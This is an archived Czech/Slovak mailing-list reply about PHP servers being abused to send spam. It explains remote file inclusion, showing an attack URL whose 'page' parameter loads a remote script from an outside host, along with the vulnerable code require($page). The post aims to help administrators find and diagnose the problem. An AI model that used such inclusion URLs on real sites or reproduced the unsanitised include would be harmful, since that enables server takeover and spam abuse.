spam z webu...

Bc. Radek Krejca radek at ceskedomeny.cz
Mon Feb 5 23:52:14 CET 2007


Dobry den,

  

5. února 2007, 22:29:29, jste napsal(a):
LM> Zdravim vsetkych,

LM>         vedel by ma niekto *nasmerovat/nakopnut*, ako si poradit zo spamom
LM> generovanym z php scriptu weboveho servera? Viem, ze otazka je velmi 
LM> vseobecna, ale neviem co mam v podstate hladat, nakolko nemam velke 
LM> znalosti z php. Jedno vsak viem urcite, ze sa to deje cez web, lebo ked
LM> odstavim web server (apache) tak to prestane. Neviem, co si kto zo 
LM> zakaznikov nasadil, mnoho vsak z nich pouziva opensource aplikacie a 
LM> tazko sa mi v nich patra. Deje sa mi to uz par dni a neviem co s tym.

Resim toto jiz nejakou dobu, s oblibou se tak deje pres neosetreny
vstup do include metodou GET. Klasicky a stale dokola mnou reseny
problem vypada takto:

http://www.domenaxx.xx/?page=http://www.geocities.com/secureserver50/Bigdoz.txt?

namisto zadaneho, lec neosetreneho:

http://www.domenaxx.xx/?page=kontakty

V kodu php to pak vypada nejak takto:

require($page);
coz je prisernost, ale pouziva to asi 90% lidi, co znam. Muze pomoct
cvicne si zapnout na apachi server-status, tam je videt takto
formulovany http request, je to videt v logu http serveru, da se to
dohledat.

To je ovsem problem php obecne, nezalezi na operacnim systemu.


-- 
S pozdravem,
 Bc. Radek Krejca
 STARNET, s. r. o.
 radek at ceskedomeny.cz






More information about the Users-l mailing list